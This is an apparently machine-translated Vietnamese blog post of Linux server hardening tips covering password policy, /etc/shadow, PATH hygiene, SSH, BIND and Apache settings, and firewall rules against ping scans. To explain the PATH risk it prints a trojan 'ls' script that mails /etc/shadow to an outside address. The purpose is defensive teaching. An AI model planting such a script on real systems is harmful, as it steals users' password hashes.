Mẹo bảo mật cho Linux (Máy chủ) của bạn (Phần 1)

@Jlcmux

5 phút

Tôi đã không xuất bản bất cứ điều gì trên blog trong một thời gian dài và tôi muốn chia sẻ với bạn một số lời khuyên được trích từ một cuốn sách, (Trong số những người khác). Tôi đã tìm thấy nó ở trường Đại học và tôi chỉ mới đọc và mặc dù nó thực sự hơi lỗi thời và các kỹ thuật được hiển thị rất khó hoạt động với sự phát triển của hệ thống, chúng cũng là những khía cạnh thú vị có thể được hiển thị. 9788448140502

Tôi muốn làm rõ rằng chúng là lời khuyên hướng đến một hệ thống Linux được sử dụng như một máy chủ, ở quy mô vừa hoặc có thể là lớn vì ở cấp độ người dùng máy tính để bàn, mặc dù chúng có thể được áp dụng nhưng chúng sẽ không hữu ích lắm.

Tôi cũng lưu ý rằng chúng là những mẹo nhanh đơn giản và tôi sẽ không đi vào chi tiết nhiều, mặc dù tôi dự định thực hiện một bài đăng khác cụ thể và sâu rộng hơn về một chủ đề cụ thể. Nhưng tôi sẽ xem điều đó sau. Bắt đầu nào.

Chính sách mật khẩu. 

Mặc dù nghe giống như một câu cửa miệng, nhưng việc có một chính sách mật khẩu tốt sẽ tạo ra sự khác biệt giữa một hệ thống dễ bị tấn công hay không. Các cuộc tấn công như "brute force" lợi dụng việc có mật khẩu xấu để truy cập hệ thống. Các mẹo phổ biến nhất là:

  • Kết hợp chữ hoa và chữ thường.
  • Sử dụng các ký tự đặc biệt.
  • Các con số.
  • Nhiều hơn 6 chữ số (hy vọng nhiều hơn 8).

Ngoài điều này, chúng ta hãy xem xét hai tệp thiết yếu.  / etc / passwd và / etc / shadow.

Một điều rất quan trọng là tệp / etc / passwd. Ngoài việc cung cấp cho chúng tôi tên của người dùng, uid, đường dẫn thư mục, bash, v.v. trong một số trường hợp, nó cũng hiển thị khóa được mã hóa của người dùng.

 Hãy xem thành phần tiêu biểu của nó.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

user: cryptkey: uid: gid: path :: path: bash

Vấn đề thực sự ở đây là tệp cụ thể này có quyền -rw-r - r– có nghĩa là nó có quyền đọc cho bất kỳ người dùng nào của hệ thống. và việc có khóa được mã hóa không quá khó để giải mã khóa thật.

Đó là lý do tại sao tệp tồn tại / etc / shadow. Đây là tệp nơi lưu trữ tất cả các khóa người dùng, trong số những thứ khác. Tệp này có các quyền cần thiết để không người dùng nào có thể đọc được.

Để khắc phục điều này sau đó, chúng ta phải vào tệp / etc / passwd và thay đổi khóa được mã hóa thành "x", điều này sẽ khiến khóa chỉ được lưu trong tệp của chúng tôi / etc / shadow.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Sự cố với PATH và .bashrc và những thứ khác.

Khi người dùng thực hiện một lệnh trên bảng điều khiển của họ, trình bao sẽ tìm kiếm lệnh đó trong danh sách thư mục chứa trong biến môi trường PATH.

Nếu bạn gõ "echo $ PATH" trong bảng điều khiển, nó sẽ xuất ra một thứ như thế này.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Mỗi thư mục đó là nơi trình bao sẽ tìm kiếm lệnh được viết để thực thi nó. Anh ta "." nó có nghĩa là thư mục đầu tiên để tìm kiếm là cùng một thư mục mà từ đó lệnh được thực thi.

Giả sử rằng có một người dùng "Carlos" và người dùng này muốn "làm điều ác". Người dùng này có thể để một tệp có tên "ls" trong thư mục chính của mình và trong tệp này thực thi một lệnh như:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Và nếu người dùng root cho những thứ của đích, cố gắng liệt kê các thư mục bên trong thư mục carlos (vì lần đầu tiên nó tìm kiếm lệnh trong cùng thư mục đó, thì vô tình nó sẽ gửi tệp có mật khẩu đến email này và sau đó các thư mục sẽ được liệt kê và anh ấy sẽ không phát hiện ra cho đến rất muộn.

Để tránh điều này, chúng ta phải loại bỏ dấu "." của biến PATH.

Theo cách tương tự, các tệp như /.bashrc, /.bashrc_profile, ./.login phải được kiểm tra và kiểm tra xem không có "." trong biến PATH và trên thực tế từ các tệp như thế này, bạn có thể thay đổi đích của một lệnh cụ thể.

Mẹo với các dịch vụ:

SHH

  • Vô hiệu hóa phiên bản 1 của giao thức ssh trong tệp sshd_config.
  • Không cho phép người dùng root đăng nhập bằng ssh.
  • Các tệp và thư mục ssh_host_key, ssh_host_dsa_key và ssh_host_rsa_key chỉ được đọc bởi người dùng root.

TRÓI BUỘC

  • Thay đổi thông báo chào mừng trong tệp name.conf để nó không hiển thị số phiên bản
  • Hạn chế chuyển vùng và chỉ kích hoạt nó cho các đội cần nó.

Apache

  • Ngăn dịch vụ hiển thị phiên bản của bạn trong thông báo chào mừng. Chỉnh sửa tệp httpd.conf và thêm hoặc sửa đổi các dòng:  

ServerSignature Off
ServerTokens Prod

  • Tắt lập chỉ mục tự động
  • Định cấu hình apache không phân phát các tệp nhạy cảm như .htacces, * .inc, * .jsp. ..V.v.
  • Xóa trang người đàn ông hoặc mẫu khỏi dịch vụ
  • Chạy apache trong môi trường đã được chroot

An ninh mạng.

Điều cần thiết là phải che tất cả các mục nhập có thể vào hệ thống của bạn từ mạng bên ngoài, sau đây là một số mẹo cần thiết để ngăn những kẻ xâm nhập quét và lấy thông tin từ mạng của bạn.

Chặn lưu lượng ICMP

Tường lửa phải được định cấu hình để chặn tất cả các loại lưu lượng ICMP đến và đi và phản hồi tiếng vọng. Với điều này, bạn tránh được điều đó, ví dụ, một máy quét đang tìm kiếm thiết bị trực tiếp trong một phạm vi ip định vị bạn. 

Tránh quét ping TCP.

Một cách để quét hệ thống của bạn là quét ping TCP. Giả sử rằng trên máy chủ của bạn có một máy chủ Apache trên cổng 80. Kẻ xâm nhập có thể gửi một yêu cầu ACK đến cổng đó, với điều này, nếu hệ thống phản hồi, máy tính sẽ còn sống và sẽ quét các cổng còn lại.

Đối với điều này, tường lửa của bạn phải luôn có tùy chọn "nhận biết trạng thái" và nên loại bỏ tất cả các gói ACK không tương ứng với kết nối hoặc phiên TCP đã được thiết lập.

Một số mẹo bổ sung:

  • Sử dụng hệ thống IDS để phát hiện quét cổng vào mạng của bạn.
  • Định cấu hình Tường lửa để nó không tin tưởng vào cài đặt cổng nguồn kết nối.

Điều này là do một số quá trình quét sử dụng cổng nguồn "giả mạo" chẳng hạn như 20 hoặc 53, vì nhiều hệ thống tin tưởng các cổng này vì chúng là điển hình của ftp hoặc DNS.

LƯU Ý: Hãy nhớ rằng hầu hết các vấn đề được chỉ ra trong bài đăng này đã được giải quyết trong hầu hết các bản phân phối hiện tại. Nhưng không bao giờ đau khi có thông tin chính về những bất tiện này để chúng không xảy ra với bạn.

LƯU Ý: Sau này mình sẽ thấy chủ đề cụ thể và mình sẽ đăng một bài với nhiều thông tin chi tiết và hiện tại hơn.

Cảm ơn mọi người đã đọc.

Chúc mừng.


Để lại bình luận của bạn

địa chỉ email của bạn sẽ không được công bố. Các trường bắt buộc được đánh dấu bằng *

*

*

  1. Chịu trách nhiệm về dữ liệu: Miguel Ángel Gatón
  2. Mục đích của dữ liệu: Kiểm soát SPAM, quản lý bình luận.
  3. Hợp pháp: Sự đồng ý của bạn
  4. Truyền thông dữ liệu: Dữ liệu sẽ không được thông báo cho các bên thứ ba trừ khi có nghĩa vụ pháp lý.
  5. Lưu trữ dữ liệu: Cơ sở dữ liệu do Occentus Networks (EU) lưu trữ
  6. Quyền: Bất cứ lúc nào bạn có thể giới hạn, khôi phục và xóa thông tin của mình.

  1.   máy vi tính dijo
    trước 8 năm

    Tôi thực sự thích bài viết và tôi quan tâm đến chủ đề này, tôi khuyến khích bạn tiếp tục tải lên nội dung.

    Trả lời thông tin